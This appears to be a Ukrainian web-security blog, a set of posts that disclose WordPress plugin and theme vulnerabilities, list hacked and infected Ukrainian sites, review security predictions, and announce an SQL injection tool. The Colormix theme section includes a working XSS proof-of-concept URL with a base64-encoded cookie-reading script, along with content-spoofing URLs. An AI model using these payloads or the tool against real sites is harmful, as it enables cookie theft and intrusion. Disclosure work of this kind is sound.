Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Mathjax Latex, podPress та FuneralPress. Для котрих з’явилися експлоіти. Mathjax Latex - це плагін для додання підтримки latex і mathml формул, podPress - це плагін для подкастінга, FuneralPress - це похоронний менеджер та гостьова книга.

• WordPress Mathjax Latex 1.1 Cross Site Request Forgery (деталі)
• WordPress podPress 8.8.10.13 Cross Site Scripting (деталі)
• WordPress FuneralPress 1.1.6 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Раніше я вже писав про численні уразливості в численних темах для WordPress виробництва RocketTheme. Окрім тем цих розробників я виявив подібні уразливості в багатьох темах інших розробників (в тому числі в custom темах).

У грудні, 22.12.2012, я знайшов Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темі Colormix для WordPress. Що аналогічні уразливостям в темах для WP від RocketTheme.

XSS (WASC-08):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Content Spoofing (WASC-12):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

Full path disclosure (WASC-13):

В папці http://site/wp-content/themes/colormix/ в index.php та багатьох інших php-файлах теми є FPD, що спрацьовують при налаштуваннях PHP по замовчуванню.

Уразливі всі версії теми Colormix для WordPress.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.gutszndn.gov.ua (хакером Sejeal) - 04.02.2013 - похаканий державний сайт, дефейс на сайті вже виправлений адмінами, але зараз він взломаний black SEO і на ньому розміщені лінки на порно сайти
• http://romen-region.gov.ua (хакерами з Kosova Hackers Crew) - 07.02.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://paritet-info.com (хакером Sejeal) - 21.01.2013, зараз сайт вже виправлений адмінами
• http://srkom.snu.edu.ua (хакером joker)
• http://vipdirection.com (хакером haxorsistz) - 04.2013, зараз сайт вже виправлений адмінами

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах IndiaNIC FAQS Manager, Level Four Storefront та WP Banners Lite. Для котрих з’явилися експлоіти. IndiaNIC FAQS Manager - це плагін для управління списками часто задаваємих питань, Level Four Storefront - це плагін для створення кошика покупця, WP Banners Lite - це локальна банерна система.

• WordPress IndiaNIC FAQS Manager 1.0 XSS / CSRF (деталі)
• WordPress Level Four Storefront SQL Injection (деталі)
• WP Banners Lite 1.40 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://turizm.zp.ua - інфекція була виявлена 08.04.2013. Зараз сайт входить до переліку підозрілих.
• http://albogroup.com - інфекція була виявлена 12.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://albogroup.com.ua - інфекція була виявлена 12.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://medbiz.com.ua - інфекція була виявлена 13.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://ukraine-today.net - інфекція була виявлена 16.04.2013. Зараз сайт не входить до переліку підозрілих.

Як і в попередні роки, надам свої прогнози розвитку веб безпеки в новому році. Але спочатку зроблю огляд тих прогнозів, що я давав на 2012 рік.

На початку минулого року я зробив свої прогнози стосовно розвитку галузі веб безпеки в минулому році. І зараз я оціню наскільки справдилися мої попередні прогнози.

1. Уразливості XSS в минулому році, як і раніше, все більше поширювалися (вони були найпоширенішими уразливостями веб додатків). Зокрема я оприлюднив уразливості у флешках, що розміщувалися на мільйонах сайтів.
2. Збільшилася кількість атак на державні сайти України - зростання взломів gov.ua-сайтів в 1,6 рази.
3. Активно знаходилися та використовувалися уразливості в браузерах (а також в плагінах, таких як Flash, Shockwave та Java) для атак на користувачів.
4. Збільшилася кількість DDoS-атак в Уанеті, в тому числі на державні сайти - зростання у 1,43 рази.
5. Значно зросла кількість заражених вірусами веб сторінок в Інтернеті. Зокрема в Уанеті в 2011 я виявив 233 інфікованих сайтів, а в 2012 вже 202 сайти (зменшення динаміки у 1,15 рази, але це я менше шукав інфіковані сайти, а насправді їх кількість зросла).
6. Збільшилися атаки на соціальні мережі, в тому числі на Twitter та були взломані LinkedIn та інші відомі сайти.
7. В Уанеті хакерська активність дещо впала порівняно з 2011 роком, зокрема в Уанеті спад на 19,5% (але то я менше досліджував, а насправді вона зросла).

Як видно всі мої попередні прогнози переважно збулися .

А тепер мій прогноз розвитку галузі веб безпеки в 2013 році.

1. Уразливостей у веб додатках буде знайдено набагато більше, ніж у інших додатках.
2. Збільшиться кількість атак на державні сайти України.
3. Зростання кількості заражених вірусами веб сторінок буде більш активним.
4. Все більше будуть використовуватися уразливості в браузерах та плагінах для атак на користувачів.
5. Втрати від кібершахрайства в Україні збільшаться.
6. Атаки на соціальні мережі та їхніх користувачів продовжать збільшуватися.
7. Продовжиться подальше зростання хакерської активності.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.disgu.gov.ua (хакером Hmei7) - 29.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://che.gov.ua (хакером ZiqoR) - 03.02.2013 - похаканий державний сайт, зараз сайт взломаний Dr.SHA6H. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті
• http://www.transavio.com.ua (хакером misafir) - 13.01.2013, зараз сайт вже виправлений адмінами
• http://www.blagfond-ch.com.ua (хакером Sejeal) - 21.01.2013, зараз сайт вже виправлений адмінами
• http://cafeneptun.com (хакерами з 3xp1r3 Cyber Army) - 09.04.2013, зараз сайт вже виправлений адмінами

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Occasions, Count Per Day та IndiaNIC FAQS Manager. Для котрих з’явилися експлоіти. Occasions - це плагін для зміни логотипів по датам, Count Per Day - це плагін для ведення статистики відвідувань, IndiaNIC FAQS Manager - це плагін для управління списками часто задаваємих питань.

• WordPress Occasions 1.0.4 Cross Site Request Forgery (деталі)
• WordPress Count Per Day 3.2.5 XSS (деталі)
• WordPress IndiaNIC FAQS Manager 1.0 SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://musicband.net.ua - інфекція була виявлена 08.04.2013. Зараз сайт входить до переліку підозрілих.
• http://tetra.zp.ua - інфекція була виявлена 09.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://key.in.ua - інфекція була виявлена 22.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://akcion.net - інфекція була виявлена 07.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://dctel.net.ua - інфекція була виявлена 05.04.2013. Зараз сайт не входить до переліку підозрілих.

Сьогодні вийшла нова версія програми SQL Shell v.1.0.4. В новій версії:

• Додана підтримка User-Agent з опцію для її включення/виключення.
• Додана підтримка Content-Type з опцію для її включення/виключення.
• Виправлена помилка з символами коментарів.

SQL Shell є консольним інтерфейсом для проведення SQL Injection атак.

Скачати: SQL_Shell_v.1.0.4.rar.